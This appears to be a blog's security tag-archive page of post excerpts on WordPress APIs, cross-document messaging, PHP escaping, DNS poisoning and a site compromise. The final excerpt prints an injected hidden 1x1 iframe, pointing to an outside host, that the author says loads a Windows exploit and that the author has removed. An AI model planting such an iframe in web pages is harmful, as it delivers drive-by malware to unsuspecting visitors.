To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off XML-RPC and AtomPUB interfaces by default. MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause: If your web service only provides one, first-class API through which all access flows, then you’ve only got one point [...]
Tag Archives: security
Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business. Blue Moon Fiber Arts, a small West Cost company, runs a ‘sock club’ service: a yarn of the month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. [...]
Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft. I’ve been reading both specifications. My notes below. Cross Document Messages In the WHAT WG model, documents can implement postMessage(). A receiving document (in another window or iframe) receives a message event, and will [...]
Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy? Neither kinky boots, nor security boasts excuse assault.
Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message: At least it’s one less thing I need to remember.
Adam: It’s easier to check ID than it is to make a judgment call. The consequences illustrated by a scene from a popular film.
Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.) He showed off something I had not noticed before. In htmlentities() you can declare an encoding. Shiflett has a straightforward approach to untainting user input: $html = array(); $html['variable'] = htmlentities($_GET['variable'],ENT_QUOTES,”utf-8″); /* Code [...]
An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine. A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession. Well, for one thing, I could had told [...]
Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page. <div style=”visibility: hidden; position: absolute; left: 1; top: 1″><iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body> The hidden iFrame loads a Windows exploit. I have it removed, for the time being. I don’t know how [...]